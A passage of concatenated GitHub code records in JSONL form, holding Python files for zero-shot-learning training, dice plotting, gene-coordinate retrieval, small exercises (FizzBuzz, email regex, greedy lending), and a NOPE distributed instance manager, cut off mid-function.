load_data(batch_size=args.batch_size)[0]\n\n word_embedding = torch.from_numpy(word_embedding).float()\n test_code = load_data(batch_size=args.batch_size)[-1]\n\n train_feats = sio.loadmat('/home/xd133/ZJL_Fusai/Features/train.mat')['features']\n train_labels = sio.loadmat('/home/xd133/ZJL_Fusai/Features/train.mat')['label']\n\n val_feats = sio.loadmat('/home/xd133/ZJL_Fusai/Features/val.mat')['features']\n val_labels = sio.loadmat('/home/xd133/ZJL_Fusai/Features/val.mat')['label']\n\n test_feats = sio.loadmat('/home/xd133/ZJL_Fusai/Features/test.mat')['features']\n\n\n train_feats = torch.from_numpy(train_feats)\n train_labels = torch.from_numpy(train_labels)\n\n val_feats = torch.from_numpy(val_feats)\n val_labels = torch.from_numpy(val_labels)\n\n test_feats = torch.from_numpy(test_feats)\n\n train_data = TensorDataset(train_feats, train_labels)\n val_data = TensorDataset(val_feats, val_labels)\n test_data = TensorDataset(test_feats)\n\n\n train_featloader = DataLoader(train_data, batch_size = args.batch_size, shuffle=True)\n val_featloader = DataLoader(val_data, batch_size=1, shuffle=False)\n test_featloader = DataLoader(test_data, batch_size=1, shuffle=False)\n\n\n\n model_Attr = AttributeNetwork(300, 1200, 2048)\n model_RN = RelationNetwork(4096, 1024)\n cnn_fc = nn.Linear(2048, 2048)\n\n optimizer_Attr = optim.Adam(list(model_Attr.parameters()) + list(cnn_fc.parameters()), lr=args.lr, weight_decay=args.wd)\n #optimizer_Attr = optim.Adam(model_Attr.parameters(), lr=args.lr,\n # weight_decay=args.wd)\n scheduler_Attr = optim.lr_scheduler.StepLR(optimizer_Attr, 200)\n optimizer_RN = optim.Adam(model_RN.parameters(), lr=args.lr, weight_decay=args.wd)\n scheduler_RN = optim.lr_scheduler.StepLR(optimizer_RN, 200)\n\n\n\n if args.test == False:\n for epoch in range(1, args.epoch):\n train_RN(model_Attr, model_RN, cnn_fc, device, train_featloader, word_embedding, optimizer_Attr, optimizer_RN,\n 
scheduler_Attr, scheduler_RN, epoch)\n # train_RN(model_Attr, model_RN, device, train_featloader, word_embedding, optimizer_Attr,\n # optimizer_RN, scheduler_Attr, scheduler_RN, epoch)\n\n\n test_RN(model_Attr, model_RN, cnn_fc, device, val_featloader, word_embedding)\n #test_RN(model_Attr, model_RN, device, val_featloader, word_embedding)\n\n torch.save(model_Attr.state_dict(), \"/home/xd133/ZJL_Fusai/output_zsl1019_2/Attr{:d}.pt\".format(epoch))\n torch.save(model_RN.state_dict(), \"/home/xd133/ZJL_Fusai/output_zsl1019_2/RN{:d}.pt\".format(epoch))\n torch.save(cnn_fc.state_dict(), \"/home/xd133/ZJL_Fusai/output_zsl1019_2/Fc{:d}.pt\".format(epoch))\n\n else:\n model_RN.load_state_dict(torch.load('/home/xd133/ZJL_Fusai/output_zsl1019_2/RN23.pt'))\n model_Attr.load_state_dict(torch.load('/home/xd133/ZJL_Fusai/output_zsl1019_2/Attr23.pt'))\n cnn_fc.load_state_dict(torch.load('/home/xd133/ZJL_Fusai/output_zsl1019_2/Fc23.pt'))\n ZSL_result(cnn_fc, model_Attr, model_RN, device, test_featloader, word_embedding, args.save_path, test_code= test_code)\n\n\n\n\n\n","repo_name":"KaiJin1995/ZSL2018_Zero_Shot_Learning","sub_path":"main_zsl.py","file_name":"main_zsl.py","file_ext":"py","file_size_in_byte":10583,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"1319696029","text":"import random\nimport plotly.express as px\nimport plotly.figure_factory as ff \ncount = []\ndice = []\nfor i in range (0,100):\n dice1 = random.randint(1,6)\n dice2 = random.randint(1,6)\n dice.append(dice1+dice2)\n count.append(i)\ngraph = px.bar(x = dice,y = count)\ngraph2 = ff.create_distplot([dice],[\"dice results\"])\ngraph.show()\ngraph2.show()\nprint(\"done\")","repo_name":"pwaghray-28/distribution","sub_path":"visualization/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71562347959","text":"import pandas as pd\nimport numpy as np\nfrom typing import Generator, Tuple\nfrom functools import lru_cache\nfrom difflib import get_close_matches\nimport logging\n\nclass Iteration:\n\n def get_gene(self, gene: str, include_z:bool = False, \n include_other:list = [], selection:str = None):\n \"\"\"Get the xy(z) coordinates of points of a queried gene.\n \n Takes \"working_selection\" into account (see dataset.Dataset for info).\n This causes the data to get loaded in RAM.\n\n Args:\n gene (str): Name of gene.\n include_z (bool, optional): True if Z coordinate should be \n returned. Defaults to False\n include_other (list, optional): List of other column headers to \n return. Defaults to [].\n selection (str): Name of column to use as boolean selection of\n datapoints. If None, returns all datapoints. Defaults to None.\n\n Returns:\n [pd.DataFrame]: Pandas Dataframe with coordinates.\n \"\"\"\n #Input checking\n #if not gene in self.unique_genes:\n # raise Exception(f'Given gene: \"{gene}\" can not be found in dataset. 
Did you maybe mean: {get_close_matches(gene, self.unique_genes, cutoff=0.4)}?')\n self.check_gene_input(gene)\n gene_i= self.gene_index[gene]\n \n if isinstance(include_other, str):\n include_other = [include_other]\n\n columns = ['x', 'y']\n if include_z:\n columns.append('z')\n for c in include_other:\n columns.append(c)\n \n #Filter based on input\n if selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].compute()\n \n #Filter based on working selection\n elif self._working_selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, self._working_selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].compute()\n \n #No selection\n else:\n return self.df.get_partition(gene_i).loc[:, columns].compute()\n\n \n def get_gene_sample(self, gene: str, include_z = False, \n include_other:list = [], frac: float=0.1, \n minimum: int=None, random_state: int=None,\n selection:str = None):\n \"\"\"Get the xyz coordinates of a sample of points of a queried gene.\n \n This causes the data to get loaded in RAM.\n\n Args:\n gene (str): Name of gene.\n include_z (bool, optional): True if Z coordinate should be \n returned. Defaults to False\n include_other (list, optional): List of other column headers to \n return. Defaults to [].\n frac (float, optional): Fraction of the points to load. \n Defaults to 0.1 which is 10% of the data.\n minimum (int, optional): If minimum is given the fraction will be \n adapted to return at least the minimum number of points. if \n there are less points than the minimum it returns all. \n Defaults to None.\n random_state (int, optional): Random state for the sampling to \n return the same points over multiple iterations.\n Defaults to None.\n \n Returns:\n [pd.DataFrame]: Pandas Dataframe with coordinates.\n \"\"\"\n #Input checking\n if not gene in self.unique_genes:\n raise Exception(f'Given gene: \"{gene}\" can not be found in dataset. Did you maybe mean: {get_close_matches(gene, self.unique_genes, cutoff=0.4)}?')\n \n if minimum != None:\n n_points = self.gene_n_points[gene]\n if n_points < minimum:\n frac = 1\n elif frac * n_points < minimum:\n frac = minimum / n_points\n \n \n gene_i= self.gene_index[gene]\n\n \n columns = ['x', 'y']\n if include_z:\n columns.append('z')\n for c in include_other:\n columns.append(c)\n\n #Filter based on input\n if selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].sample(frac=frac, random_state=random_state).compute()\n \n #Filter based on working selection\n elif self._working_selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, self._working_selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].sample(frac=frac, random_state=random_state).compute()\n \n #No selection\n else:\n return self.df.get_partition(gene_i).loc[:, columns].sample(frac=frac, random_state=random_state).compute()\n \n \n \n \n\n \n \n \n \nclass _old_stuff:\n \n def _group_by(self, by='g'):\n return self.df.groupby(by).apply(lambda g: np.array([g.x, g.y]).T, meta=('float64')).compute()\n \n \n def make_gene_coordinates(self, save_z = False) -> None:\n \"\"\"Make a dictionary with point coordinates for each gene.\n\n Output will be in self.gene_coordinates. 
Output will be cached so that\n this function can be called many times but the calculation is only\n performed the first time.\n\n \"\"\"\n if self._offset_flag == True:\n \n if save_z:\n self.gene_coordinates = {g: np.column_stack((xy, np.array([self.z_offset]*xy.shape[0]))).astype('float64') for g, xy in self._group_by().to_dict().items()}\n \n else:\n self.gene_coordinates = self._group_by().to_dict()\n \n self._offset_flag = False\n \n else:\n logging.info('Gene coodinates already calculated. skipping')\n pass\n \n\n def xy_groupby_gene_generator(self, gene_order: np.ndarray = None) -> Generator[Tuple[str, np.ndarray, np.ndarray], None, None]:\n \"\"\"Generator function that groups XY coordinates by gene.\n\n Uses the Pandas groupby() function for speed on unsorted numpy arrays.\n\n Yields:\n Iterator[Union[str, np.ndarray, np.ndarray]]: Gene name, X \n coordinates, Y coordinates.\n\n \"\"\"\n df = pd.DataFrame(data = np.column_stack((self.x, self.y, self.gene)), columns = [self.x_label, self.y_label, self.gene_label])\n grouped = df.groupby(self.gene_label)\n \n if not isinstance(gene_order, np.ndarray):\n gene_order = self.unique_genes\n \n for g in gene_order:\n data = grouped.get_group(g)\n yield g, data.loc[:, self.x_label].to_numpy(), data.loc[:, self.y_label].to_numpy()\n\n def make_pandas(self):\n pandas_df = pd.DataFrame(data = np.column_stack([self.x, self.y, self.gene]), columns = [self.x_label, self.y_label, self.gene_label])\n return pandas_df\n \n @lru_cache(maxsize=None)\n def _make_xy_coordinates(self):\n return {g: np.column_stack((x, y)).astype('float32') for g, x, y in self.xy_groupby_gene_generator()}\n \n def _make_xyz_coordinates(self):\n return {g: np.column_stack((xy, np.array([self.z_offset]*xy.shape[0]))).astype('float32') for g, xy in self._make_xy_coordinates().items()}\n\n def make_gene_coordinates(self, save_z = False) -> None:\n \"\"\"Make a dictionary with point coordinates for each gene.\n\n Output will be in self.gene_coordinates. 
Output will be cached so that\n this function can be called many times but the calculation is only\n performed the first time.\n\n \"\"\"\n if save_z:\n self.gene_coordinates = self._make_xyz_coordinates()\n else:\n self.gene_coordinates = self._make_xy_coordinates()\n \n\n\n\nclass MultiIteration(Iteration):\n\n def make_multi_gene_coordinates(self, n_jobs=None) -> None:\n\n #if n_jobs == None:\n # n_jobs = self.cpu_count\n\n for d in self.datasets:\n d.make_gene_coordinates()\n\n #with Parallel(n_jobs=n_jobs, backend='loky') as parallel:\n # parallel(delayed(d.make_gene_coordinates) for d in self.datasets)\n\n","repo_name":"linnarsson-lab/FISHscale","sub_path":"FISHscale/utils/fast_iteration.py","file_name":"fast_iteration.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"38005703578","text":"def getfail(P):\n n = len(P)\n i = 1\n j = 0\n f = [0 for _ in range(n)]\n while i < n:\n while j and P[i] != P[j]:\n j = f[j - 1]\n if P[i] == P[j]:\n j += 1\n f[i] = j\n i += 1\n return f\n\ndef pow1(a, b):\n r = 1\n while b != 0:\n if b & 1:\n r = r * a\n a = a * a\n b >>= 1\n return r\n\ndef fibo(n):\n global dp\n if dp[n] != -1:\n return dp[n]\n dp[n] = (fibo(n-1) << len(str(format(fibo(n-2), 'b')))) + fibo(n-2)\n return dp[n]\n \ndp = [0, 1] + [-1 for i in range(99)]\nn = int(input())\nprint(fibo(n))\n","repo_name":"witoru/many_things","sub_path":"boj/4206.py","file_name":"4206.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2337758803","text":"import re\n\ndef fizzbuzz(n):\n result = []\n\n for i in range(1, n + 1):\n if i % 5 == 0 and i % 3 == 0:\n result.append('FizzBuzz')\n elif i % 5 == 0:\n result.append('Buzz')\n elif i % 3 == 0:\n result.append('Fizz')\n else:\n result.append(i)\n \n return result\n\n\nprint(fizzbuzz(15))\n\nregex = '^[a-z]+[_]?[-]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$'\n\ndef check_email(email):\n if (re.search(regex, email)):\n print('Valid')\n else:\n print('Invalid')\n\n\nprint('maybsalvalaio@gmail.com')\ncheck_email('maybsalvalaio@gmail.com')\nprint('12teste@lalaa.com')\ncheck_email('12teste@lalaa.com')\nprint('test.test@oiwer.com')\ncheck_email('test.test@oiwer.com')\nprint('ueh_ewjhr@sjh.ais')\ncheck_email('ueh_ewjhr@sjh.ais')\nprint('ueh-ewjhr@sjh.ais')\ncheck_email('ueh-ewjhr@sjh.ais')\nprint('uehwjhr@sjh.aidfs')\ncheck_email('uehwjhr@sjh.aidfs')","repo_name":"Maysa-B/trybe-exercicios","sub_path":"ciencia-da-computacao/bloco-32/dia-3/exercicios.py","file_name":"exercicios.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39328121028","text":"def solution(n, lost, reserve):\n lost, reserve = initialize(lost, reserve)\n answer = n - len(lost)\n for lost_student in lost:\n if can_borrow_from_left(lost_student, reserve):\n reserve.remove(lost_student - 1)\n answer += 1\n elif can_borrow_from_right(lost_student, reserve, n):\n reserve.remove(lost_student + 1)\n answer += 1\n return answer\n\n\ndef initialize(lost, reserve):\n new_lost, new_reserve = lost[:], reserve[:]\n for lost_element in lost:\n if lost_element in reserve:\n new_lost.remove(lost_element)\n new_reserve.remove(lost_element)\n new_lost.sort()\n new_reserve.sort()\n return new_lost, new_reserve\n\n\ndef can_borrow_from_left(student, reserve):\n if student == 1:\n return False\n return student - 
1 in reserve\n\n\ndef can_borrow_from_right(student, reserve, n):\n if student == n:\n return False\n return student + 1 in reserve\n","repo_name":"Junroot/Algorithm","sub_path":"programmers/42862.py","file_name":"42862.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1837989090","text":"#!/usr/bin/env python\n# @author Martin Karkowski\n# @email m.karkowski@zema.de\n\nimport asyncio\nimport json\n\nfrom nope.communication.bridge import Bridge\nfrom nope.dispatcher.connectivityManager import NopeConnectivityManager\nfrom nope.dispatcher.rpcManager import NopeRpcManager\nfrom nope.helpers import SPLITCHAR, ensureDottedAccess, generateId, isIterable, EXECUTOR, waitFor, varifyPath, formatException\nfrom nope.logger import defineNopeLogger\nfrom nope.merging import DictBasedMergeData\nfrom nope.modules import NopeGenericModule\nfrom nope.observable import NopeObservable\n\n\nclass NopeInstanceManager:\n\n def __init__(self, options, _defaultSelector, _id=None,\n _connectivityManager=None, _rpcManager=None, _core=None):\n\n self.options = options\n self._defaultSelector = _defaultSelector\n self._id = _id\n self._connectivityManager = _connectivityManager\n self._rpcManager = _rpcManager\n self._core = _core\n self._communicator: Bridge = options.communicator\n self.__disposed = False\n\n if _id is None:\n self._id = generateId()\n if _connectivityManager is None:\n self._connectivityManager = NopeConnectivityManager(\n options, id=self._id)\n if _rpcManager is None:\n self._rpcManager = NopeRpcManager(\n options,\n self._defaultSelector,\n id=self._id,\n connectivityManager=self._connectivityManager\n )\n\n self._logger = defineNopeLogger(\n options.logger, 'core.instance-manager')\n\n # Flag to indicate, that the system is ready.\n self.ready = NopeObservable()\n self.ready.setContent(False)\n\n self._mappingOfRemoteDispatchersAndGenerators = dict()\n # Overview of the available Constructors in the network.\n self.constructors = DictBasedMergeData(\n self._mappingOfRemoteDispatchersAndGenerators, '+', '+')\n self._mappingOfRemoteDispatchersAndInstances = dict()\n\n # Overview of the available instances in the network.\n # - OriginalKey = DispatcherID (string);\n # - OriginalValue = Available Instance Messages (IAvailableInstancesMsg);\n # - ExtractedKey = The name of the Instance (string);\n # - ExtractedValue = instance-description (INopeModuleDescription);\n self.instances = DictBasedMergeData(\n self._mappingOfRemoteDispatchersAndInstances, 'instances/+', 'instances/+/identifier')\n\n self._internalWrapperGenerators = dict()\n self._registeredConstructors = dict()\n self._instances = dict()\n self._externalInstances = dict()\n self._internalInstances = set()\n self._initializingInstance = dict()\n self._externalInstancesNames = set()\n\n # Contains the identifiers of the instances, which are hosted in the\n # provided dispatcher.\n self.internalInstances = NopeObservable()\n self.internalInstances.setContent([])\n\n self.constructorServices = NopeObservable()\n self.constructorServices.setContent([])\n\n _ctorStart = f'nope{SPLITCHAR}core{SPLITCHAR}constructor{SPLITCHAR}'\n\n def _extractGenerators(*args):\n\n constructorServices = set()\n\n self._mappingOfRemoteDispatchersAndGenerators.clear()\n for dispatcher, services in self._rpcManager.services.originalData.items():\n def _filterMatchingServices(svc):\n if \"id\" in svc and svc.id.startswith(_ctorStart):\n 
constructorServices.add(svc[\"id\"])\n return True\n return False\n\n generators = list(\n map(\n lambda item: item.id[len(_ctorStart):],\n filter(\n _filterMatchingServices,\n services.services\n )\n )\n )\n\n if len(generators):\n self._mappingOfRemoteDispatchersAndGenerators[dispatcher] = generators\n\n self.constructorServices.setContent(list(constructorServices))\n self.constructors.update()\n\n # Subscribe to changes.\n self._rpcManager.services.data.subscribe(_extractGenerators)\n\n if self._logger:\n self._logger.info('core.instance-manager online')\n\n self.reset()\n EXECUTOR.callParallel(self._init)\n\n async def _sendAvailableInstances(self):\n # Update the Instances provided by this module.\n await self._communicator.emit(\n \"instancesChanged\",\n {\n \"dispatcher\": self._id,\n # We will send the descriptions.\n # Generate the Module Description for every identifier:\n \"instances\": list(\n map(lambda item: self._instances[item][\"instance\"].toDescription(), self._internalInstances))\n }\n )\n\n # Update the Instances\n self.internalInstances.setContent(list(self._internalInstances))\n\n async def _init(self):\n\n await self._communicator.connected.waitFor()\n await self._connectivityManager.ready.waitFor()\n await self._rpcManager.ready.waitFor()\n\n async def _generateWrapper(dispather, description):\n mod = NopeGenericModule(\n dispather,\n # self._generateEmitter,\n # self._generateObservable\n )\n await mod.fromDescription(description, \"overwrite\")\n return mod\n\n self.registerInternalWrapperGenerator(\n \"*\",\n _generateWrapper\n )\n\n def _onDispatchersChanged(changes, *args):\n \"\"\" Callback which will handle new and offline Dispatchers.\n \"\"\"\n\n if len(changes.added):\n # If there are dispatchers online,\n # We will emit our available services.\n EXECUTOR.callParallel(self._sendAvailableInstances)\n\n if len(changes.removed):\n # Remove the dispatchers.\n for removedId in changes.removed:\n self.removeDispatcher(removedId)\n\n # We will use our status-manager to listen to changes.\n self._connectivityManager.dispatchers.onChange.subscribe(\n _onDispatchersChanged)\n\n # Make shure we are emitting the instances provided.\n await self._communicator.on(\"bonjour\", lambda *args: EXECUTOR.callParallel(self._sendAvailableInstances))\n\n def _onInstancesChanged(message, *args):\n \"\"\" Callback which will be called if the commincator receives a Message\n that some instances has been changed.\n\n Args:\n message: The Message from the System.\n \"\"\"\n # Store the instance.\n self._mappingOfRemoteDispatchersAndInstances[message.dispatcher] = message\n\n # Update the Mapping\n self.instances.update()\n\n if self._logger:\n self._logger.debug(\n 'Remote Dispatcher \"' + str(message.dispatcher) + '\" updated its available instances')\n\n # Listen to the Changes.\n await self._communicator.on(\"instancesChanged\", _onInstancesChanged)\n\n if self._logger:\n self._logger.debug(\"core.instance-manager \" +\n str(self._id) + \" initialized\")\n\n self.ready.setContent(True)\n\n def getServiceName(self, name: str, type: str) -> str:\n \"\"\" Helper to get the corresponding Service name\n\n Args:\n name (str): Name of the Service\n _type (str): The desired type of the requested service name. 
Could be \"dispose\" or \"constructor\"\n\n Returns:\n str: The Adapted Name\n \"\"\"\n if type == \"constructor\":\n return f\"nope{SPLITCHAR}core{SPLITCHAR}constructor{SPLITCHAR}{name}\"\n elif type == \"dispose\":\n return f\"nope{SPLITCHAR}core{SPLITCHAR}destructor{SPLITCHAR}{name}\"\n else:\n raise Exception(\"The given type is not correct.\")\n\n def _getInstanceInfo(self, identifier: str):\n \"\"\" Function, that will extract the information of the instance and the providing dispatcher.\n\n Args:\n identifier (str): The identifier of instance\n \"\"\"\n # First check if the instance exists.\n if not self.instanceExists(identifier, False):\n return None\n\n ret = ensureDottedAccess({})\n\n # First we check if we are taking care of an internal instance, if so\n # we will use this instance to enrich the description, otherwise, we\n # will look in the external instances.\n if identifier in self._instances:\n ret.description = self._instances[identifier].instance.toDescription(\n )\n else:\n for item in self._mappingOfRemoteDispatchersAndInstances.values():\n instances = item.instances\n\n for instance in instances:\n if instance.identifier == identifier:\n ret.description = instance\n break\n\n ret.dispatcher = self.getManagerOfInstance(identifier)\n\n return ret\n\n def removeDispatcher(self, dispatcher: str):\n \"\"\" Helper to remove a dispatcher.\n\n Args:\n dispatcher (str): The Id of the Dispatcher\n \"\"\"\n if self._mappingOfRemoteDispatchersAndInstances.pop(dispatcher, False):\n self.instances.update()\n\n async def registerConstructor(self, identifier: str, cb):\n \"\"\" Registers a Constructor, that enables other NopeInstanceManagers to create an instance of the given type. Therefore a callback \"cb\" is registered with the given \"typeIdentifier\"\n\n Args:\n identifier (str): The identifier for the Constructor (Like a service)\n cb (function): The callback used, to create an instance. The Callback receives the following parameters (NopeCore, identifier:str)\n \"\"\"\n\n if self._logger:\n self._logger.debug(\n 'Adding instance generator for \"' + (identifier +\n '\" to external Generators. 
Other Elements can now create instances of this type.'\n                                                     ))\n\n        async def createInstance(data):\n\n            # Check if an instance exists or not.\n            # If not => create an instance and store it.\n\n            if data.identifier not in self._instances:\n                hashableData = [data.identifier, data.params, data.type]\n                try:\n                    hashed = hash(tuple(hashableData))\n                except BaseException:\n                    hashed = json.dumps(hashableData)\n\n                # It might happen that an instance is requested multiple times.\n                # Therefore we have to make sure we won't create it multiple times:\n                # We will test it by using the \"_internalInstances\" set\n\n                if data.identifier not in self._initializingInstance:\n\n                    try:\n\n                        # Mark the Instance as available.\n                        self._initializingInstance[data.identifier] = hashed\n\n                        # Create the Instance\n                        _instance = await cb(self._core, data.identifier)\n                        _instance.identifier = data.identifier\n\n                        # Make sure the Data is expressed as an Array.\n                        if not isIterable(data.params):\n                            data.params = [data.params]\n\n                        # Initialize the instance with the parameters.\n                        await _instance.init(*data.params)\n\n                        async def disposeInstance(_data):\n                            \"\"\" A Function is registered, taking care of removing\n                                an instance, if it isn't needed any more.\n\n                            Args:\n                                _data (msg): The message containing the dispatcher id.\n                            \"\"\"\n\n                            _data = ensureDottedAccess(_data)\n\n                            if self._instances.get(data.identifier).usedBy:\n                                try:\n\n                                    if _data.dispatcherId in self._instances.get(\n                                            data.identifier).usedBy:\n                                        # Pop the dispatcher if it is present:\n                                        idx = self._instances.get(\n                                            data.identifier).usedBy.index(\n                                            _data.dispatcherId)\n                                        self._instances.get(\n                                            data.identifier).usedBy.pop(idx)\n\n                                    if len(self._instances.get(\n                                            data.identifier).usedBy) == 0:\n                                        # Unmark as internal instance\n                                        self._internalInstances.remove(\n                                            data.identifier)\n                                        # Remove the Instance.\n                                        await _instance.dispose()\n                                        # Removes the instances\n                                        self._instances.pop(data.identifier)\n                                        # Remove the Function itself\n                                        await self._rpcManager.unregisterService(self.getServiceName(data.identifier, 'dispose'))\n                                        # Emit the instances again\n                                        await self._sendAvailableInstances()\n\n                                except ValueError:\n                                    pass\n\n                        # A Function is registered, taking care of removing\n                        # an instance, if it isn't needed any more.\n                        await self._rpcManager.registerService(\n                            disposeInstance,\n                            ensureDottedAccess({\n                                'id': self.getServiceName(data.identifier, 'dispose'),\n                                'schema': ensureDottedAccess({\n                                    'description': f'Service, which acts as the destructor for the instance \"{data.identifier}\". 
This function will be called internally only.',\n                                    'type': 'function'})\n                            })\n                        )\n\n                        # Store the Instance.\n                        self._instances[data.identifier] = ensureDottedAccess({\n                            'instance': _instance,\n                            'usedBy': [data.dispatcherId]\n                        })\n\n                        self._internalInstances.add(data.identifier)\n\n                        # Update the available instances:\n                        await self._sendAvailableInstances()\n\n                        # Make sure we remove this instance hash\n                        self._initializingInstance.pop(data.identifier)\n\n                    except BaseException as E:\n                        # Make sure we remove this instance hash\n                        self._initializingInstance.pop(data.identifier)\n\n                        raise E\n\n                elif self._initializingInstance.get(data.identifier) != hashed:\n                    raise Exception(\n                        'Providing different Parameters for the same Identifier'\n                    )\n                else:\n                    # Check if the Instance is ready.\n                    firstHint = True\n\n                    def checker():\n                        nonlocal firstHint\n                        if firstHint:\n                            self._logger.warn(\n                                f'Parallel request for the same Instance \"{data.identifier}\" => Waiting until the Instance has been initialized')\n                            firstHint = False\n                        return data.identifier in self._instances\n\n                    await waitFor(\n                        checker,\n                        ensureDottedAccess({\n                            'testFirst': True,\n                            'delay': 100\n                        })\n                    )\n            else:\n                # If an Element exists => Add the Element.\n                self._instances.get(data.identifier).usedBy.append(\n                    data.dispatcherId)\n\n            # Define the Response.\n            response = ensureDottedAccess({\n                'description': self._instances.get(data.identifier).instance.toDescription(),\n                'type': data.type\n            })\n\n            # Send the Response\n            return response\n\n        _cb = await self._rpcManager.registerService(\n            createInstance,\n            ensureDottedAccess({\n                # We will add the Name to our service.\n                'id': self.getServiceName(identifier, 'constructor'),\n                # We don't want to have a Prefix for constructors\n                'addNopeServiceIdPrefix': False,\n                'schema': ensureDottedAccess({\n                    'description': f'Service, which will create a constructor for the type \"{identifier}\".',\n                    'type': 'function'\n                })\n            })\n        )\n\n        # Store a generator\n        self._registeredConstructors[identifier] = _cb\n\n    async def unregisterConstructor(self, identifier: str):\n        \"\"\" Unregisters a present Constructor. After this, created instances are still valid, but the user isn't able to create new ones.\n\n        Args:\n            identifier (str): The identifier for the Constructor (Like a service)\n        \"\"\"\n        if identifier in self._registeredConstructors:\n            if self._logger:\n                self._logger.debug('Removing instance generator for \"' + identifier +\n                                   '\" from external Generators. Other Elements cannot create instances of this type anymore.')\n\n            # We will just unregister the service from our\n            # system. Therefore we just use the rpcManager\n\n            await self._rpcManager.unregisterService(self._registeredConstructors.get(identifier))\n            self._registeredConstructors.pop(identifier)\n\n    def registerInternalWrapperGenerator(self, identifier: str, cb):\n        \"\"\" By default a generic wrapper will be returned when an instance is created. You\n            can specify a specific wrapper type for a given \"typeIdentifier\" with this method.\n\n        Args:\n            identifier (str): The identifier for the Constructor (Like a service)\n            cb (function): The Callback which creates the specific wrapper.\n        \"\"\"\n        if self._logger:\n            self._logger.debug('Adding instance generator for \"' + identifier +\n                               '\" as internal Generator. 
This Generator will not be used externally.')\n\n        self._internalWrapperGenerators[identifier] = cb\n\n    def unregisterInternalWrapperGenerator(self, identifier: str):\n        \"\"\" Removes a specific generator for a wrapper.\n\n        Args:\n            identifier (str): The identifier for the Constructor (Like a service)\n        \"\"\"\n        if self._logger:\n            self._logger.debug('Removing instance generator for \"' + identifier +\n                               '\" from internal Generators. The system cannot create elements of this type any more.')\n\n        self._internalWrapperGenerators.pop(identifier)\n\n    def instanceExists(self, identifier: str, externalOnly=True) -> bool:\n        \"\"\" Helper, to test if an instance with the given identifier exists or not.\n\n        Args:\n            identifier (str): identifier of the instance.\n            externalOnly (bool, optional): If set to true we will only look for external instances in the external dispatchers. Defaults to True.\n\n        Returns:\n            bool: The test result\n        \"\"\"\n        if identifier not in self.instances.simplified:\n            return False\n\n        if externalOnly:\n            manager = self.getManagerOfInstance(identifier)\n            return manager[\"id\"] != self._id\n\n        return True\n\n    def getManagerOfInstance(self, identifier: str):\n        \"\"\" Returns the hosting dispatcher for the given instance.\n\n        Args:\n            identifier (str): The identifier for the instance (its name)\n\n        Returns:\n            INopeStatusInfo | False: The Status or false if not present.\n        \"\"\"\n        # First we will check if the instance is available internally\n        if identifier in self._internalInstances:\n            return self._connectivityManager.info\n\n        # If that isn't the case, we will check all dispatchers and search for the\n        # instance.\n        for iter_item in self._mappingOfRemoteDispatchersAndInstances.items():\n            dispatcher = iter_item[0]\n            msg = iter_item[1]\n            for instance in msg.instances:\n                if instance.identifier == identifier:\n                    return self._connectivityManager.getStatus(dispatcher)\n\n        return None\n\n    def getInstanceDescription(self, instanceIdentifier: str):\n        \"\"\" Returns the instance Description for a specific instance. It is just a simplified wrapper\n            for the \"instances\"-property.\n\n        Args:\n            instanceIdentifier (str): The identifier for the instance (its name)\n\n        Returns:\n            INopeModuleDescription | False: The Description or False if not found.\n        \"\"\"\n        if instanceIdentifier in self._instances:\n            return self._instances.get(\n                instanceIdentifier).instance.toDescription()\n\n        for data in self._mappingOfRemoteDispatchersAndInstances.values():\n            instances = data.get(\"instances\", [])\n            for instance in instances:\n                if instance[\"identifier\"] == instanceIdentifier:\n                    return instance\n\n        return False\n\n    def constructorExists(self, typeIdentifier: str) -> bool:\n        \"\"\" Helper to test if a constructor linked to the provided \"typeIdentifier\" exists or not.\n\n        Args:\n            typeIdentifier (str): The identifier for the Constructor (Like a service)\n\n        Returns:\n            bool: True if a matching constructor exists in the network.\n        \"\"\"\n        return typeIdentifier in self.constructors.data.getContent()\n\n    async def createInstance(self, description, options=None):\n        \"\"\" Allows creating an instance. This might happen on a remote dispatcher or\n            on the same element. Only a wrapper is returned, which communicates with a\n            dispatcher, because we don't know where the element is provided. 
You can use the\n            method \"getDispatcherForInstance\" to determine the dispatcher running the instance.\n\n            The returned wrapper acts like a normal \"internal\" class.\n\n        Args:\n            description (dict-like): Description of the instance to be created\n            options (dict-like, optional): Options used during creating the instance. Defaults to None.\n\n\n        Returns:\n            NopeGenericModule | Registered Wrapper: A Generic Nope Module as Wrapper or a custom wrapper for the class.\n        \"\"\"\n\n        # Define the Default Description\n        # which will lead to an error.\n\n        options = ensureDottedAccess(options)\n        description = ensureDottedAccess(description)\n\n        # Assign the provided Description\n        _description = ensureDottedAccess({\n            'dispatcherId': self._id,\n            'identifier': 'error',\n            'params': [],\n            'type': 'unknown'\n        })\n        _description.update(description)\n        _description.update({'dispatcherId': self._id})\n\n        # Check if the Description is complete\n        if _description.type == 'unknown' or _description.identifier == 'error':\n            raise Exception(\n                'Please provide at least a \"type\" and \"identifier\" in the parameters')\n\n        # Use the verified Name (removes the invalid chars.)\n        _description.identifier = varifyPath(\n            _description.identifier) if self.options.forceUsingValidVarNames else _description.identifier\n        if self._logger:\n            self._logger.debug('Requesting an Instance of type: \"' + _description.type +\n                               '\" with the identifier: \"' + str(_description.identifier) + '\"')\n\n        try:\n            _type = _description.type\n            if _type not in 